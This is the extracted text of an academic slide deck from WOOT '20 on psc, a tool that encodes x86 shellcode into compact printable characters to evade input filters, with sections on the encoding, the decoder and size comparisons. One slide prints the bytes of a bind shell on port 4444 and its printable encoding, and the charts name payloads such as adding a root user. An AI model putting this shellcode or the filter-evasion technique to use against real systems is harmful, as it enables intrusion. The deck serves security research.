Automatic Generation of Compact Printable Shellcodes For x86 WOOT ’20 Dhrumil Patel Aditya Basu Anish Mathuria August 11, 2020
Outline Introduction Currently used Algorithms Motivation Printable Shellcode Compiler ( psc ) Results Conclusion
Printable Shellcodes Defensive filters strip all the printable characters from input. This ruins most injection attacks. Attacker’s Goal is to generate code that consists only of: 0123456789 ABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyz !\"#$%&\’()*+,-./:;<=>?@[\\]^_‘{|}~
Currently Used Algorithms Riley Eller Algorithm Source to Source Conversion “ Any dword (4 bytes) can be derived from two Geczi and Ivanyi replace all or three SUB instructions whose operands are non-printable instructions with a printable bytes ” sequence of printable instruction(s) Av ailable as a Metasploit plugin Ex. 0 x 89 e 3 cd 80 bytes from execv /bin/sh 38 byte shellcode → 9837 bytes shellcode printable shellcode # Constants are printable (0x21-0x7E) sub $0x256d6d2d, % eax Not publicly available sub $0x256d6d25, % eax sub $0x34574225, % eax push % eax Each byte is encoded with � 2 . 5 bytes
We Need Compact Shellcodes T ransforming to printable ⇒ increases shellcode size Size restrictions on input Example Buffer overflow exploits are limited by the buffer size.
Printable Shellcode Compiler Overview Encoding Scheme Runtime Decoder Testing
psc : Printable Shellcode Compiler Arbitrary shellcode → Printable shellcode Special encoding scheme Hand-crafted decoder that is printable Decoder (size = 146 bytes) Encoded shellcode Custom Decoder loop XOR Encoded payload (size = 73 bytes) Patcher Printable shellcode
psc Encoding Scheme Original Byte #1 Original Byte #1 b 0 b 1 b 2 b 3 b 4 b 5 b 6 b 7 Original Byte #2 Original Byte #2 b 8 b 9 b 10 b 11 b 12 b 13 b 14 b 15 R ange of Encoded Bytes � ( 0 x 3 F , 0 x 7 E ) Encoded B1 = 0x3F Encoded B1 = 0x3F + 0 0 0 0 b 0 b 1 b 2 b 3 Encoded Encoded B2 B2 = 0x3F + = 0x3F + 0 0 b 4 b 5 b 6 b 7 b 8 b 9 Encoded B3 Encoded B3 = 0x3F + = 0x3F + 0 0 b 10 b 11 b 12 b 13 b 14 b 15
psc Runtime Decoding Ini Initializer ECX: Read Pointer EDX: Write Pointer Lo Loop Let, B1 ← [ECX] B2 ← [ECX + 1] B3 ← [ECX + 2] 3 bytes encoded payload → 2 bytes NO NO recovered shellcode B1 = 0x26 YE YES Recover first byte, R1 ← (B1 << 4) + (B2 & 0x3F) >> 2 Recover second byte, R2 ← (B2 << 6) + (B3 & 0x3F) Read ‘&’ (= 0x26 ) → jump to recovered shellcode Write R1 to [EDX] Write R2 to [EDX+1] EDX ← EDX +2 Recovered ECX ← ECX + 3 Shellcode
Testing Decoder Encoded shellcode Custom Decoder loop XOR SI SIGTERM RM Encoded payload (size = 73 bytes) Patcher For Testing Signal handler checks Rec overed Shellcode == Original Shellcode
psc In Action Shellcode to spawn shell on 4444/TCP \x31\xc0\x31\xdb\x53\x43\x53\x6a\x02\x89\xe1\ ‘PYj0X40HP[j0X0Y50AO0YO0Y‘0 xb0\x66\xcd\x80\x97\x31\xc0\x43\x50\x66\x68\ Aa0Ya0Ab0Yi0Aj0Y x11\x5c\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\ j0Ak0Ym0Yn binary to xe1\xb0\x66\xcd\x80\x50\x57\x89\xe1\xb0\x66\ rII0Y70A80Y80A90Y=0Y>0YGQZOyI&t<j0X40P[2 x83\xc3\x02\xcd\x80\x50\x50\x57\x89\xe1\x04\ YIC?,42AJ@$<?’20’wBIj0X40P[2YJC2AK@?,6$ x66\x43\xcd\x80\x93\x31\xc0\x31\xc9\xb1\x02\ printable ?0’wBJBBAAAuAa5he4‘i/DZ2Fu4XR5gA7f‘;u?4} xb0\x3f\xcd\x80\x49\x79\xf9\x50\x66\x68\x73\ V8Mo5XU5Xg/Sx5XR7f‘5gO4DV7f‘;u?:@e: x68\x68\x2f\x2f\x62\x61\x68\x2f\x62\x69\x6e\ KC4XV7f‘;u?:@e3LU4XV7f‘;u?4dX:CA8Mo2~ x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\ L7@H6fx:?J5_n1|r5‘g1|a5dm7fb3EH;jL7AO& x80 Find at https://github.com/dhrumil29699/Printable-Encoder/
Results Encoding Performance Total Output Size
Results: Only Encoded Shellcode Enc Encodi oding ng Pe Perfo rform rmanc ance shell on 8080/TCP over SSL HTTP Server on 8800/TCP psc encoding is more download file & execute Orig Or igina inal compact than Riley Eller shell on 4444/TCP Rile Ri ley E y Ell ller er algorithm ps psc copy /etc/passwd add root user execve /bin/sh 0 500 1000 1500 2000 bytes
Results: Decoder & Encoded Shellcode Tot Total al Ou Outpu tput S t Siz ize shell on 8080/TCP over SSL HTTP Server on 8800/TCP F or large shellcodes, psc download file & execute Or Orig igina inal beats the Riley Eller shell on 4444/TCP Rile Ri ley E y Ell ller er algorithm ps psc copy /etc/passwd add root user execve /bin/sh 0 500 1000 1500 2000 bytes
psc vs ALPHA3 psc encoding outperforms ALPHA3. ALPHA3 changes 1 byte → 2 bytes psc changes 1 byte → 1.5 bytes However, the compact encoding makes our decoder complicated. psc beats ALPHA3 for larger shellcodes ( size > 236 bytes).
Concluding Remarks W e present a new encoding algorithm that uses looped decoding to reduce the size of the auto-generated printable shellcodes. We produce about 40 % − 50 % smaller printable shellcodes as compared to the Riley Eller algorithm. F uture Plan Add support for x86_64 shellcodes
References Riley Eller Bypassing MSB Data Filters for Buffer Overflow Exploits on Intel Platforms http://julianor.tripod.com/bc/bypass-msb.txt. Zsolt Géczi and Peter Iványi (2018) Automatic translation of assembly shellcodes to printable byte codes Pollack Periodica 13(04), 3–20. B.J. Wever ALPHA3 https://github.com/SkyLined/alpha3.
Thanks! Dhrumil Patel Devops at Acko Technology and Services Private Ltd. 201601228@daiict.ac.in Aditya Basu PhD Student at Penn State aditya.basu@psu.edu Anish Mathuria Professor at DA-IICT anish_mathuria@daiict.ac.in
Recommend
More recommend
